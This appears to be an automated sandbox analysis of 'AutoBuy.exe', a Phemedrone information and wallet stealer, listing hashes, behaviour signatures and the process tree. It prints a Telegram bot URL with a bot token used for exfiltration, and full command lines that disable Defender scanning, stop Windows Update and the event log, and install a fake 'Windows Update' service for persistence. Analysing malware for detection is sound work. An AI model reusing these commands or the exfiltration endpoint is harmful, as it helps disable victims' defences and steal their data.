Analysis
-
max time kernel
24s -
max time network
23s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
31-03-2024 11:44
Static task
static1
Behavioral task
behavioral1
Sample
AutoBuy.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
AutoBuy.exe
Resource
win10v2004-20240226-en
General
-
Target
AutoBuy.exe
-
Size
2.8MB
-
MD5
ec3328cb44fb4e760b5cdef7bbbcd6f6
-
SHA1
d93d74a1200418ec041d4206513d511da870eaec
-
SHA256
ceb1bbd8e4e6d29926c8011524897693a3240a4bda727d309987a6541cd98907
-
SHA512
e33563185221acfaf7352a37555f8b1c4f73a962f4ae96e1dee52e8f034bc416fee22dff8bba698b596576470c0572abcf5e2dea1929f6151aac05678e78ca01
-
SSDEEP
49152:JxppTslWVwj1GowiT4QRW5CX42rZSkvFksV4qBNmP+X:JxpHVwIozyg3jvbVHBNI
Malware Config
Extracted
phemedrone
https://api.telegram.org/bot6719312271:AAE1QFaFTcG0HSHiQXVv7gdDUMwSNOPMadg/sendMessage?chat_id=-4194654645
Signatures
-
Phemedrone
An information and wallet stealer written in C#.
-
Creates new service(s) 1 TTPs
-
Stops running service(s) 3 TTPs
-
Executes dropped EXE 3 IoCs
Processes:
java2.exevlad.exejava.exepid process 2712 java2.exe 1212 vlad.exe 2860 java.exe -
Loads dropped DLL 7 IoCs
Processes:
AutoBuy.exejava2.exeWerFault.exepid process 1988 AutoBuy.exe 2712 java2.exe 2712 java2.exe 1260 2768 WerFault.exe 2768 WerFault.exe 2768 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 4 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1952 sc.exe 1216 sc.exe 1584 sc.exe 1892 sc.exe 1976 sc.exe 844 sc.exe 1860 sc.exe 2268 sc.exe 2852 sc.exe 2968 sc.exe 872 sc.exe 2316 sc.exe 1628 sc.exe 700 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2768 1212 WerFault.exe vlad.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
vlad.exejava.exepid process 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 1212 vlad.exe 2860 java.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
vlad.exedescription pid process Token: SeDebugPrivilege 1212 vlad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
AutoBuy.exejava2.exevlad.exedescription pid process target process PID 1988 wrote to memory of 2712 1988 AutoBuy.exe java2.exe PID 1988 wrote to memory of 2712 1988 AutoBuy.exe java2.exe PID 1988 wrote to memory of 2712 1988 AutoBuy.exe java2.exe PID 1988 wrote to memory of 1212 1988 AutoBuy.exe vlad.exe PID 1988 wrote to memory of 1212 1988 AutoBuy.exe vlad.exe PID 1988 wrote to memory of 1212 1988 AutoBuy.exe vlad.exe PID 1988 wrote to memory of 1212 1988 AutoBuy.exe vlad.exe PID 2712 wrote to memory of 2860 2712 java2.exe java.exe PID 2712 wrote to memory of 2860 2712 java2.exe java.exe PID 2712 wrote to memory of 2860 2712 java2.exe java.exe PID 1212 wrote to memory of 2768 1212 vlad.exe WerFault.exe PID 1212 wrote to memory of 2768 1212 vlad.exe WerFault.exe PID 1212 wrote to memory of 2768 1212 vlad.exe WerFault.exe PID 1212 wrote to memory of 2768 1212 vlad.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"C:\Users\Admin\AppData\Local\Temp\AutoBuy.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\java2.exe"C:\Users\Admin\AppData\Local\Temp\java2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Users\Admin\AppData\Local\Temp\java.exe"C:\Users\Admin\AppData\Local\Temp\java.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2860 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Drops file in System32 directory
PID:2796
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2252
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:2256
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:1584
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1952
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:2316
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:1892
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:1860
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵PID:392
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵PID:1100
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵PID:1048
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵PID:1508
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "Windows Update"4⤵
- Launches sc.exe
PID:1976
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "Windows Update" binpath= "C:\ProgramData\Microsoft\update.exe" start= "auto"4⤵
- Launches sc.exe
PID:1628
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:700
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "Windows Update"4⤵
- Launches sc.exe
PID:844
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\vlad.exe"C:\Users\Admin\AppData\Local\Temp\vlad.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1212 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 18123⤵
- Loads dropped DLL
- Program crash
PID:2768
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:2748
-
C:\ProgramData\Microsoft\update.exeC:\ProgramData\Microsoft\update.exe1⤵PID:2888
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵PID:2656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵PID:1164
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵PID:108
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2852
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2268
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:1216
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2968
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:872
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD56c2a334b8a1f7571ae651ae09f039336
SHA1a440631ad9e46e67453d555ddef7e29b62f2aaaa
SHA256fbb7aec70c631b98440883fa9224ae4ff08374ae72cd25874781148d6155f1a0
SHA51278d0124c9cbb69ce6e44eb9832018f959a9c3df9697bdc4e5f45870184f58ba8ae6c1efa99326da7538e9ea450365a3a3702ffd27f02114e0234f60a8aeb05de
-
Filesize
2.6MB
MD55dfe953861753222629629ba6121a0bc
SHA1d56d226b950a773d947c7fc42dcff9788a61f4b7
SHA256f23ec1a549bda11f572a2e58f692855a6344bce1ad683ddd730f12342e099975
SHA512aaddb836207c42b6b795ebf8696373d9b4bc56b73cdea47141348955bd49f2d71088d1d97f06813ed5f72b40775c8c25cb23a78048ea4c223e2e4ef7f98d3e2d
-
Filesize
512KB
MD50dd8757d42380787ba7162a7776f30c5
SHA118465ff3c76fc6c441a195b679047f9089b269de
SHA256a6ed050ec8b21feafd3335a3396258be13a2d29601030be8f4b20c682759a2fb
SHA512d0a8354a7af21702f70b5ef7f3440a4755b6e1bb4e39a5c821fcac34e2f019dc73243764ef037efb2ad4de05855ced057d95bc8cdfa1c74ebb27194421297c22
-
Filesize
2.4MB
MD52e75e6685ca0b820eacf7259f6c53418
SHA1ff9a92e1838470fc4a9d6aeb8c3bb13b1fa68a65
SHA256fe6983f8876ca1dc4dcc950e9ed20e75f5e22d14f77075d1256f06c266338683
SHA51217c4902ed0726af8141c74232b87c262a076a65ff63d9d5a0298b475c47820ebe772be41147fafccfee338161dab8210d0a3d22fbe707b895824fac2a48d8ae9
-
Filesize
2.2MB
MD58b56866df60b0f2c6d22389ee5049eba
SHA123eb6887bc3dc5d3f9278e2d26c52706b8155c7d
SHA2564d057b38289c3df732a5a33837facd07eca558d3b7f2657f36d7c1433fd9f81f
SHA5125ed5fc5ae8363dba3ac14725e3d41ef16cc19314f264b4292190bc58c192a2abb01a3ef24f4c61f3c97f59ad4cdd2a9c47de82e47a762214d8b49075332b1577
-
Filesize
2.1MB
MD5fafce5048ad4b205b36844d78f036435
SHA19e310d6e583722889099bc46f1c8821d31881dab
SHA25639a0270fb0a39cbcc11463681a11fdd7146254c306d79f0500775c09b0ee7eea
SHA512c2d9d1462f9cda573cc676fbafa5b093940e8071c80fe866e33dea8b22f8462f6fb688c3eeb9a6d71f0617b6792a04191639c41ada2c5259a0e5291c63b7e39a